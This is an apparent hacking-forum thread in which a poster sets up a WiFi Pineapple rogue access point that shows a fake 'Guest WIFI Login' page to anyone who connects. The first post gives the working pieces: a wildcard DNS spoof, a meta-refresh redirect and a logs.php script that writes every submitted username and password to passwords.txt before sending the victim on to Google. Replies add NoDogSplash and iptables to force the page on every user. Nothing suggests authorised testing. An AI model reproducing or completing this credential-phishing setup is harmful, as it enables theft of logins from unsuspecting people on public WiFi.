Jump to content

Recommended Posts

Posted (edited)

I finally got my pineapple wifi up and running and its great. I tested SSLstrip and I love it, very nice script. Recently I downloaded a phishing zip off the website here, with the following contents:

index.html

facebook.html

twitter.html

peets.html

error.php

redirect.php

test.php

Now I haved used phishing pages before but the file I am most interested in is "peets.html" its basically a fake "Guest WIFI Login" for users. My only problem is this page does not come up every time you connect to the "Pineapple WIFI" when a browser is opened. Now what I want to achieve here, is to get this phishing page to load every time a user is connected to the wifi when he/she opens a url in the browser.

Now my DNS SPOOF is updated in Configuration Settings>DNS Spoof tab:

172.16.42.1 *

And my "index.php (Phishing)":

<html>
<head>
<meta http-equiv="REFRESH" content=0;url=redirect.php">
</head>
<body>
</body>
</html> 

Now in my "www" folder on the Pineapple server I have the following files and their contents:

test.php

<?php phpinfo(); ?>

index.php

<html> <head> <meta http-equiv="REFRESH" content="0;url=redirect.php"> </head> <body> </body> </html>

redirect.php

<?php $ref = $_SERVER['HTTP_REFERER']; require('index2.php'); ?>

index2.php

Now this is the phish page. This is the page I want to show every time a user is connected to the "Pineapple WIFI" when they first open the browser and enter a url. In order to use the wifi, they must login with a user name and password to use the WIFI. After they login then they will be redirected to "www.google.com" in the "logs.php" file.

logs.php (To capture login/pass)

<?php $yourpagesource = "https://www.google.com/"; $handle = fopen("passwords.txt", "a"); foreach($_POST as $variable => $value) { fwrite($handle, $variable."=".$value); } fwrite($handle, "\r\n"); fclose($handle); header('Location: http://google.com/'); exit; ?>

Any help would be awesome!!!

Edited by winkillerx
Posted (edited)

look into no dog splash for the pineapple otherwise known as the captive portal infusion i believe you can redirect with iptables on a different port.

Edited by mreidiv
Posted (edited)

Instead of using all the files. I just changed the "DNS SPOOF" index.php in "Configuration" to the main phish page, as seen below.

Then I just made the login/pass forms record to a text file on the root pineapple server.

post-46493-0-82484200-1392578305_thumb.p

Edited by winkillerx
  • 2 months later...
Posted

I am now using NoDogSplash, just creating my own splash page :) Thanks mreidiv!

Is it possible to use NoDogSplash with PHP as well ?

I have editied the splash which works fine, but I'll be damned if I can get it talking to any backend systems.

Do you have any examples you can post if you have a backend PHP ?

Thanks.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...